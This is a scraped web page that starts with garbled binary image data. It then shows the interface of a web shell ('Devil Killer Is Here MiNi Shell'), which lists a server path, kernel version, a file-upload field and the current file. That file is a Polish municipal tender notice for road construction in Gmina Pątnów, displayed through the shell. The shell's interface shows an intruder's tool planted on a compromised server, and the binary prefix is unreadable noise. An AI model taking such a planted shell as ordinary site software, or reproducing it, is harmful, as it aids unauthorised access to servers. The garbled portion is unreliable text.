JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250916/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250916/0042572901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa dróg na terenie gminy Pątnów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pątnów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934714</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pątnów 48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pątnów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-335</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@patnów.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.patnow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa dróg na terenie gminy Pątnów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1c7c5d3e-cbdf-4b2c-a145-24362b897973</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00425729</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00031999/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa dróg na terenie gminy Pątnów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1176292 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem:<br/>platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/patnow. <br/>Zamawiający dopuszcza, opcjonalnie komunikację między Zamawiającym a Wykonawcą przy użyciu: poczty elektronicznej: przetargi@patnow.pl (za wyjątkiem oferty (Załącznika nr 3 do SWZ) i oświadczeń wstępnych z art. 125 Pzp (Zał. nr 4 i 5 do SWZ), które obligatoryjnie składane są za pośrednictwem Platformy zakupowej.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa w art. 125 ust, 1ustawy Pzp podmiotowe środki dowodowe, przedmiotowe środki dowodowe, pełnomocnictwa, oświadczenie podmiotu udostępniającego zasoby i inne Oświadczenia wymagane w postępowaniu sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx,.odt.<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego&#34;. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego&#34;, po którym pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert - kierowanie do ogółu zainteresowanych Zamawiający będzie zamieszczał na Platformie w sekcji „Komunikaty&#34;. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pt do konkretnego wykonawcy.<br/>Do komunikowania się z Wykonawcami uprawniona jest:<br/>• Magdalena Więcław, e-mail: magdalenawieclaw@patnow.pl;<br/>• Joanna Pazgan, e-mail: joannapazgan@patnow.pl. <br/>W przypadku pytań technicznych dotyczących funkcjonowania i obsługi technicznej Platformy Zakupowej wskazuje kontakt z Centrum Wsparcia Klienta, które udziela wszelkich informacji związanych z procesem składania ofert, rejestracji oraz innych aspektów technicznych Platformy. Centrum wsparcia Klienta dostępne jest od poniedziałku do piątku w godz.: od 7:00 do 17:00 pod numerem telefonu (22)101-02-02 lub e-mail cwk@platformazakupowa.pl.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>Zgodnie z art. 67 ustawy Pzp Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej<br/>niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Pozostałe wymagania zostały zawarte w Rozdziale XII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119z 04.05.2016r., str. 1), dalej „RODO”, informujemy, że:<br/>1)	Administratorem danych osobowych Wykonawcy jest Gmina Pątnów;<br/>2)	Administrator wyznaczył Inspektora Danych Osobowych, z którym mogą się Państwa skontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych za pośrednictwem adresu e-mail: inspektor@cbi24.pl lub pisemnie na adres Administratora;<br/>3) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji;<br/>4)	odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Pzp,<br/>5)	dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2024 r. poz. 1320) - w skrócie „Pzp”, przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania danych osobowych przez Wykonawcę bezpośrednio Wykonawcy dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>7)	w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	Wykonawca posiada:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>b) na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Wykonawca, że przetwarzanie danych osobowych Wykonawcy dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawcy nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>10) Przysługuje Wykonawcy prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie danych osobowych Wykonawcy przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.9.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I: Budowa drogi gminnej w m. Kałuże, gm. Pątnów – Trasa 3.<br/>Inwestycja polega na wykonaniu robót budowlanych tj. budowie drogi gminnej w m. Kałuże (Trasa 3) na odcinku o długości ok. 0,294 km i zapewnieniu niezbędnych materiałów budowlanych, celem zrealizowania umowy. Zakres robót obejmuje m.in.:<br/>• roboty rozbiórkowi i przygotowawcze (m.in.: pomiary, karczowanie i oczyszczenie terenu);<br/>• roboty ziemne (m.in.: wykopy oraz przekopy w gruncie, plantowanie i obrabianie);<br/>• wykonanie przyjezdnego prefabrykowanego ścieku betonowego; <br/>• wykonanie konstrukcji jezdnej drogi o nawierzchni asfaltowej i szerokości 4,0m <br/>Uwaga!!! Wykonanie zgodnie z rys. T2/TS3/A1 – przekrój konstrukcyjny Trasa 3<br/>• wykonanie w ciągu trasy mijanki o szerokości 5,0m;<br/>• wykonanie obustronnych poboczy o nawierzchni z kruszywa i szerokości 0,75m;<br/>• wykonanie zjazdów na działki bezpośrednio z pobocza drogi;<br/>•	wykonanie oznakowania pionowego i poziomego.<br/>Zadanie dofinasowane ze środków budżetu Województwa Łódzkiego w ramach umowy nr 578/RR/2025 z dnia 23.06.2025 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty, dla każdej z Części, Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Lp.	Nazwa kryterium	Waga<br/>1.	Cena (C)	60 %<br/>2.	Okres gwarancji jakości i rękojmi (G)	40 %<br/>Razem	100 %<br/><br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Kryterium Cena (C) – waga 60%<br/> cena najniższa brutto*<br/>C = ———————————————— x 100 pkt x 60%<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepolegających odrzuceniu<br/>Podstawą przyznania punków w Kryterium cena (C) będzie cena oferowana brutto podana przez Wykonawcę w Formularzy oferty. <br/>Cena oferowana brutto musi uwzględniać wszystkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia. <br/>W tym kryterium można uzyskać maksymalnie 60 punktów. Przyznane punktu zostaną zaokrąglone do dwóch miejsc po przecinku. <br/>2) Kryterium Okres gwarancji jakości i rękojmi (G) – waga 40%<br/>Liczba punktów za kryterium „Okres gwarancji jakości i rękojmi&#34; będzie liczony wg. następującego wzoru:<br/>G = (Gbad / Gmax ) x 100 pkt x 40 %<br/>gdzie:<br/>G - ilość punktów przyznanej danej ofercie za okres gwarancji jakości i rękojmi;<br/>Gbad - okres gwarancji jakości i rękojmi podany przez oferenta, dla którego wynik jest<br/>obliczany.<br/>Gmax - najdłuższy okres gwarancji jakości i rękojmi spośród badanych ofert;<br/>Zamawiający ustala minimalny okres gwarancji jakości i rękojmi na przedmiot<br/>zamówienia na 36 miesięcy, zaś maksymalny na 60 miesiące.<br/>Zaoferowanie przez Wykonawcę okresu gwarancji jakości i rękojmi zamówienia poniżej<br/>ustalonego minimum, spowoduje odrzucenie oferty, jej treść jest niezgodna z warunkami zamówienia - art. 226 ust. l pkt 5 ustawy Pzp.<br/>Zaoferowanie przez Wykonawcę okresu gwarancji jakości i rękojmi zamówienia powyżej ustalonego maksimum będzie traktowane przez Zamawiającego jako maksymalny wymagany czas gwarancji i rękojmi tj. 60 miesięcy<br/>W przypadku braku zaoferowania przez Wykonawcę okresu gwarancji jakości i rękojmi,<br/>Zamawiający do oceny przyjmie minimalny przewidziany w postępowaniu okres, czyli 36 miesięcy.<br/>Okres rękojmi równa się okresowi gwarancji.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów. Przyznane punktu zostaną zaokrąglone do dwóch miejsc po przecinku. <br/>3) Łączna ocena ofert: <br/>W= C + G <br/>gdzie:<br/>W – wskaźnik oceny ofert,<br/>C – ilość punktów przyznanych w Kryterium „Cena”<br/>G – ilość punktów przyznanych w Kryterium „Okres gwarancji jakości i rękojmi”<br/>Punktacja przyznawana ofertą w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. <br/>Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100 pkt.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawi taki sam wskaźnik oceny oferty, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: Budowa drogi gminnej w m. Kałuże od km 0+0,000 do km 0+276,16, gm. Pątnów.<br/>Inwestycja polega na wykonaniu robót budowlanych tj. budowie drogi gminnej w m. Kałuże (Grabowszczyzna) na odcinku o długości ok. 0,276 km i zapewnieniu niezbędnych materiałów budowlanych, celem zrealizowania umowy. Zakres robót obejmuje m.in.:<br/>• roboty rozbiórkowi i przygotowawcze (m.in.: pomiary, karczowanie i oczyszczenie terenu, <br/>• roboty ziemne (m.in.: wykopy oraz przekopy w gruncie, plantowanie i obrabianie, humusowanie terenu);<br/>• wykonanie przyjezdnego prefabrykowanego ścieku betonowego; <br/>• wykonanie konstrukcji jezdnej drogi o nawierzchni asfaltowej i szerokości 4,0m;<br/>• wykonanie obustronnych poboczy z kruszywa i szerokości 0,75m;<br/>• wykonanie zjazdów <br/>• wykonanie oznakowania pionowego i poziomego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty, dla każdej z Części, Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Lp.	Nazwa kryterium	Waga<br/>1.	Cena (C)	60 %<br/>2.	Okres gwarancji jakości i rękojmi (G)	40 %<br/>Razem	100 %<br/><br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Kryterium Cena (C) – waga 60%<br/> cena najniższa brutto*<br/>C = ———————————————— x 100 pkt x 60%<br/> cena oferty ocenianej brutto<br/><br/>*spośród wszystkich złożonych ofert niepolegających odrzuceniu<br/>Podstawą przyznania punków w Kryterium cena (C) będzie cena oferowana brutto podana przez Wykonawcę w Formularzy oferty. <br/>Cena oferowana brutto musi uwzględniać wszystkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia. <br/>W tym kryterium można uzyskać maksymalnie 60 punktów. Przyznane punktu zostaną zaokrąglone do dwóch miejsc po przecinku. <br/>2) Kryterium Okres gwarancji jakości i rękojmi (G) – waga 40%<br/>Liczba punktów za kryterium „Okres gwarancji jakości i rękojmi&#34; będzie liczony wg. następującego wzoru:<br/>G = (Gbad / Gmax ) x 100 pkt x 40 %<br/>gdzie:<br/>G - ilość punktów przyznanej danej ofercie za okres gwarancji jakości i rękojmi;<br/>Gbad - okres gwarancji jakości i rękojmi podany przez oferenta, dla którego wynik jest<br/>obliczany.<br/>Gmax - najdłuższy okres gwarancji jakości i rękojmi spośród badanych ofert;<br/>Zamawiający ustala minimalny okres gwarancji jakości i rękojmi na przedmiot<br/>zamówienia na 36 miesięcy, zaś maksymalny na 60 miesiące.<br/>Zaoferowanie przez Wykonawcę okresu gwarancji jakości i rękojmi zamówienia poniżej<br/>ustalonego minimum, spowoduje odrzucenie oferty, jej treść jest niezgodna z warunkami zamówienia - art. 226 ust. l pkt 5 ustawy Pzp.<br/>Zaoferowanie przez Wykonawcę okresu gwarancji jakości i rękojmi zamówienia powyżej ustalonego maksimum będzie traktowane przez 